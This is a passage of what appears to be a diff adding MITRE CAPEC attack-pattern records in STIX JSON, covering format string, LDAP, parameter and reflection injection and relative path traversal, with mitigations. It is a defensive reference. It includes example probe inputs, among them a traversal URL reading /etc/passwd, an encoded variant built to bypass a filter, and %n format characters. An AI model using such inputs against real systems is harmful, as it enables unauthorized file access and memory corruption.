Exclude user input from format strings, 2011--05, CERT", + "external_id": "REF-14", + "source_name": "reference_from_CAPEC", + "url": "https://www.securecoding.cert.org/confluence/display/seccode/FIO30-C.+Exclude+user+input+from+format+strings" + }, + { + "description": "Robert Auger, WASC Threat Classification 2.0, The Web Application Security Consortium (WASC)", + "external_id": "REF-15", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/Format-String" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-616", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Format_String_Injection.html" + } + ], + "id": "attack-pattern--cbabea0a-39ed-4a6f-b752-238fe8c730af", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Format String Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--cde07b71-23e6-418d-93e9-665f5f83b032" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Untrusted search path vulnerability in the add_filename_to_string function in intl/gettext/loadmsgcat.c for Elinks 0.11.1 allows local users to cause Elinks to use an untrusted gettext message catalog (.po file) in a \"../po\" directory, which can be leveraged to conduct format string attacks. See also: CVE-2007-2027" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey application: The adversary takes an inventory of the entry points of the application.

  2. Techniques
    Spider web sites for all available links
    List parameters, external variables, configuration files variables, etc. that are possibly used by the application.

Experiment

  1. Determine user-controllable input susceptible to format string injection: Determine the user-controllable input susceptible to format string injection. For each user-controllable input that the adversary suspects is vulnerable to format string injection, attempt to inject formatting characters such as %n, %s, etc.. The goal is to manipulate the string creation using these formatting characters.

  2. Techniques
    Inject probe payload which contains formatting characters (%s, %d, %n, etc.) through input parameters.

Exploit

  1. Try to exploit the Format String Injection vulnerability: After determining that a given input is vulnerable to format string injection, hypothesize what the underlying usage looks like and the associated constraints.

  2. Techniques
    Insert various formatting characters to read or write the memory, e.g. overwrite return address, etc.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--4cd18074-15c1-4206-8391-115685669623" + ], + "x_capec_prerequisites": [ + "The target application must accept a strings as user input, fail to sanitize string formatting characters in the user input, and process this string using functions that interpret string formatting characters." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "In order to discover format string vulnerabilities it takes only low skill, however, converting this discovery into a working exploit requires advanced knowledge on the part of the adversary." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Limit the usage of formatting string functions.", + "id": "course-of-action--2fed494b-5a78-425c-acaa-11d9ffec4342", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-135-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d7b9dd8b-8e73-4e2b-ba24-d8b7c5a033ec", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2fed494b-5a78-425c-acaa-11d9ffec4342", + "target_ref": "attack-pattern--cbabea0a-39ed-4a6f-b752-238fe8c730af", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": 
"Strong input validation - All user-controllable input must be validated and filtered for illegal formatting characters.", + "id": "course-of-action--132cab4e-0189-4458-80c6-5fce45bee5b1", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-135-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dcb94cfe-e24f-4a9f-90fe-c4f2388067b2", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--132cab4e-0189-4458-80c6-5fce45bee5b1", + "target_ref": "attack-pattern--cbabea0a-39ed-4a6f-b752-238fe8c730af", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker manipulates or crafts an LDAP query for the purpose of undermining the security of the target. Some applications use user input to create LDAP queries that are processed by an LDAP server. For example, a user might provide their username during authentication and the username might be inserted in an LDAP query during the authentication process. An attacker could use this input to inject additional commands into an LDAP query that could disclose sensitive information. For example, entering a * in the aforementioned query might return information about all users on the system. 
This attack is very similar to an SQL injection attack in that it manipulates a query to gather additional information or coerce a particular return value.", + "external_references": [ + { + "external_id": "CAPEC-136", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/136.html" + }, + { + "external_id": "CWE-77", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/77.html" + }, + { + "external_id": "CWE-90", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/90.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "description": "LDAP Injection", + "external_id": "29", + "source_name": "WASC", + "url": "http://projects.webappsec.org/LDAP-Injection" + }, + { + "description": "LDAP Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/LDAP_Injection" + }, + { + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "external_id": "REF-17", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/LDAP-Injection" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-608", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_LDAP_Injection.html" + } + ], + "id": "attack-pattern--4b435e98-08cb-4464-bf08-32f95e011d05", + "modified": "2020-12-17T00:00:00.000Z", + "name": "LDAP Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2fb2b2b8-b7de-45a2-aadb-5849d12fda8f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass 
Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Availability": [ + "Unreliable Execution" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "PowerDNS before 2.9.18, when running with an LDAP backend, does not properly escape LDAP queries, which allows remote attackers to cause a denial of service (failure to answer ldap questions) and possibly conduct an LDAP injection attack. See also: CVE-2005-2301" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey application: The attacker takes an inventory of the entry points of the application.

  2. Techniques
    Spider web sites for all available links
    Sniff network communications with application using a utility such as WireShark.

Experiment

  1. Determine user-controllable input susceptible to LDAP injection: For each user-controllable input that the attacker suspects is vulnerable to LDAP injection, attempt to inject characters that have special meaning in LDAP (such as a single quote character, etc.). The goal is to create a LDAP query with an invalid syntax

  2. Techniques
    Use web browser to inject input through text fields or through HTTP GET parameters
    Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, or other HTTP header.
    Use modified client (modified by reverse engineering) to inject input.
  3. Try to exploit the LDAP injection vulnerability: After determining that a given input is vulnerable to LDAP Injection, hypothesize what the underlying query looks like. Possibly using a tool, iteratively try to add logic to the query to extract information from the LDAP, or to modify or delete information in the LDAP.

  4. Techniques
    Add logic to the LDAP query to change the meaning of that command. Automated tools could be used to generate the LDAP injection strings.
    Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, or other HTTP header.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target application must accept a string as user input, fail to sanitize characters that have a special meaning in LDAP queries in the user input, and insert the user-supplied string in an LDAP query which is then processed." + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to have knowledge of LDAP, especially its query syntax." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as LDAP content.", + "id": "course-of-action--e5e6818b-d525-4ade-8d2e-11e4664731e6", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-136-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9f1eb213-9854-4530-b7ae-cb3659bd69ac", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e5e6818b-d525-4ade-8d2e-11e4664731e6", + "target_ref": "attack-pattern--4b435e98-08cb-4464-bf08-32f95e011d05", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use of custom error pages - Attackers can glean information about the nature of queries from descriptive error messages. 
Input validation must be coupled with customized error pages that inform about an error without disclosing information about the LDAP or application.", + "id": "course-of-action--b1261793-b0f9-4ad7-90fb-d3f6a464ccfe", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-136-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--674db528-648e-458e-81fc-e9ef0a61222e", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b1261793-b0f9-4ad7-90fb-d3f6a464ccfe", + "target_ref": "attack-pattern--4b435e98-08cb-4464-bf08-32f95e011d05", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary manipulates the content of request parameters for the purpose of undermining the security of the target. Some parameter encodings use text characters as separators. For example, parameters in a HTTP GET message are encoded as name-value pairs separated by an ampersand (&). If an attacker can supply text strings that are used to fill in these parameters, then they can inject special characters used in the encoding scheme to add or modify parameters. For example, if user input is fed directly into an HTTP GET request and the user provides the value \"myInput&new_param=myValue\", then the input parameter is set to myInput, but a new parameter (new_param) is also added with a value of myValue. This can significantly change the meaning of the query that is processed by the server. 
Any encoding scheme where parameters are identified and separated by text characters is potentially vulnerable to this attack - the HTTP GET encoding used above is just one example.", + "external_references": [ + { + "external_id": "CAPEC-137", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/137.html" + }, + { + "external_id": "CWE-88", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/88.html" + } + ], + "id": "attack-pattern--cde07b71-23e6-418d-93e9-665f5f83b032", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Parameter Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Integrity": [ + "Modify Data (Successful parameter injection attacks mean a compromise to integrity of the application.)" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--3e3f4570-827b-4e0e-859b-00a4b13a1a65", + "attack-pattern--cbabea0a-39ed-4a6f-b752-238fe8c730af", + "attack-pattern--e3a32913-a4a6-4a3c-8f3b-a8a6dc16df53", + "attack-pattern--582943a5-d66c-48a9-8cf8-76e511222c7d", + "attack-pattern--2a8824eb-4fd0-45a4-9c3c-af3fd7c5e0ca", + "attack-pattern--b97b706c-8b6e-4681-a22b-89d5e53134b7" + ], + "x_capec_prerequisites": [ + "The target application must use a parameter encoding where separators and parameter identifiers are expressed in regular text.", + "The target application must accept a string as user input, fail to sanitize characters that have a special meaning in the parameter encoding, and insert the user-supplied string in an encoding which is then processed." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. The only requirement is the ability to provide string input to the target." 
+ ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement an audit log written to a separate host. In the event of a compromise, the audit log may be able to provide evidence and details of the compromise.", + "id": "course-of-action--1b38336c-de87-49c0-9183-cdb80f9fb73b", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-137-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--87d764be-a2f1-4a91-b9fb-61093b531c50", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1b38336c-de87-49c0-9183-cdb80f9fb73b", + "target_ref": "attack-pattern--cde07b71-23e6-418d-93e9-665f5f83b032", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Treat all user input as untrusted data that must be validated before use.", + "id": "course-of-action--96f190f9-bfce-4fbd-b4fd-9d07e68f3681", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-137-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f667d453-e763-41ac-ad05-bcda477818fd", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--96f190f9-bfce-4fbd-b4fd-9d07e68f3681", + "target_ref": "attack-pattern--cde07b71-23e6-418d-93e9-665f5f83b032", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary supplies a value to the target application which is then used by reflection methods to identify a class, method, or field. For example, in the Java programming language the reflection libraries permit an application to inspect, load, and invoke classes and their components by name. If an adversary can control the input into these methods including the name of the class/method/field or the parameters passed to methods, they can cause the targeted application to invoke incorrect methods, read random fields, or even to load and utilize malicious classes that the adversary created. 
This can lead to the application revealing sensitive information, returning incorrect results, or even having the adversary take control of the targeted application.", + "external_references": [ + { + "external_id": "CAPEC-138", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/138.html" + }, + { + "external_id": "CWE-470", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/470.html" + } + ], + "id": "attack-pattern--e3a32913-a4a6-4a3c-8f3b-a8a6dc16df53", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Reflection Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--cde07b71-23e6-418d-93e9-665f5f83b032" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The target application must utilize reflection libraries and allow users to directly control the parameters to these methods. If the adversary can host classes where the target can invoke them, more powerful variants of this attack are possible.", + "The target application must accept a string as user input, fail to sanitize characters that have a special meaning in the parameter encoding, and insert the user-supplied string in an encoding which is then processed." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker exploits a weakness in input validation on the target by supplying a specially constructed path utilizing dot and slash characters for the purpose of obtaining access to arbitrary files or resources. 
An attacker modifies a known path on the target in order to reach material that is not available through intended channels. These attacks normally involve adding additional path separators (/ or \\) and/or dots (.), or encodings thereof, in various combinations in order to reach parent directories or entirely separate trees of the target's directory structure.", + "external_references": [ + { + "external_id": "CAPEC-139", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/139.html" + }, + { + "external_id": "CWE-23", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/23.html" + }, + { + "description": "OWASP Testing Guide (v4), 2010, The Open Web Application Security Project (OWASP)", + "external_id": "REF-9", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/index.php/Testing_for_Path_Traversal_(OWASP-AZ-001)" + }, + { + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "external_id": "REF-10", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/w/page/13246952/Path-Traversal" + } + ], + "id": "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Relative Path Traversal", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + 
"x_capec_example_instances": [ + "\n The attacker uses relative path traversal to access files in the application. This is an example of accessing user's password file.\n http://www.example.com/getProfile.jsp?filename=../../../../etc/passwd\n However, the target application employs regular expressions to make sure no relative path sequences are being passed through the application to the web page. The application would replace all matches from this regex with the empty string.\n Then an attacker creates special payloads to bypass this filter:\n http://www.example.com/getProfile.jsp?filename=%2e%2e/%2e%2e/%2e%2e/%2e%2e /etc/passwd\n When the application gets this input string, it will be the desired vector by the attacker.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Fingerprinting of the operating system: In order to perform a valid path traversal, the adversary needs to know what the underlying OS is so that the proper file seperator is used.

  2. Techniques
    Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.
    TCP/IP Fingerprinting. The adversary uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.
    Induce errors to find informative error messages
  3. Survey application: Using manual or automated means, an adversary will survey the target application looking for all areas where user input is taken to specify a file name or path.

  4. Techniques
    Use a spidering tool to follow and record all links on a web page. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of a web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.
    Use a browser to manually explore a website and analyze how it is constructed. Many browser plug-ins are available to facilitate the analysis or automate the URL discovery.

Experiment

  1. Attempt variations on input parameters: Using manual or automated means, an adversary attempts varying relative file path combinations on all found user input locations and observes the responses.

  2. Techniques
    Provide \"../\" or \"..\\\" at the beginning of any filename to traverse to the parent directory
    Use a list of probe strings as path traversal payload. Different strings may be used for different platforms. Strings contain relative path sequences such as \"../\".
    Use a proxy tool to record results of manual input of relative path traversal probes in known URLs.

Exploit

  1. Access, modify, or execute arbitrary files.: An adversary injects path traversal syntax into identified vulnerable inputs to cause inappropriate reading, writing or execution of files. An adversary could be able to read directories or files which they are normally not allowed to read. The adversary could also access data outside the web document root, or include scripts, source code and other kinds of files from external websites. Once the adversary accesses arbitrary files, they could also modify files. In particular situations, the adversary could also execute arbitrary code or system commands.

  2. Techniques
    Manipulate file and its path by injecting relative path sequences (e.g. \"../\").
    Download files, modify files, or try to execute shell commands (with binary files).
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target application must accept a string as user input, fail to sanitize combinations of characters in the input that have a special meaning in the context of path navigation, and insert the user-supplied string into path navigation commands." + ], + "x_capec_skills_required": { + "High": "To bypass non trivial filters in the application", + "Low": "To inject the malicious payload in a web page" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Input validation. Assume that user inputs are malicious. Utilize strict type, character, and encoding enforcement", + "id": "course-of-action--03927772-a50c-42a3-b4ff-f72892917b5e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-139-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--00ca197d-8e7f-4dc6-ab81-53dcf255f9f1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--03927772-a50c-42a3-b4ff-f72892917b5e", + "target_ref": "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cbcc574c-56af-4a8a-b9c0-d5b4d59b58ed", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 
"relationship_type": "mitigates", + "source_ref": "course-of-action--b3379e8f-995d-4df7-be15-7861c104b55c", + "target_ref": "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6783fbbe-cb1a-4317-b126-e62c3d58ea7a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--eb88c845-46c6-4223-adf2-ac06a363bac2", + "target_ref": "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Prefer working without user input when using file system calls", + "id": "course-of-action--58beef38-a794-42dd-9869-09e4f46ad695", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-139-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aa273050-3e5a-48ed-99c7-1995e7e3dddf", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--58beef38-a794-42dd-9869-09e4f46ad695", + "target_ref": "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--7fa50c0f-70d2-46b9-9b96-8a6d35003ae2", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f972cf8f-5c89-4e6c-87ad-8eb40c32883b", + "target_ref": "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--42bb8848-1460-40e7-8946-994f5692eb0b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4dc38767-be73-424a-b909-90eb4773dfa3", + "target_ref": "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This type of attack exploits a buffer overflow vulnerability in targeted client software through injection of malicious content from a custom-built hostile service. This hostile service is created to deliver the correct content to the client software. 
For example, if the client-side application is a browser, the service will host a webpage that the browser loads.", + "external_references": [ + { + "external_id": "CAPEC-14", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/14.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-353", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/353.html" + }, + { + "external_id": "CWE-118", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. 
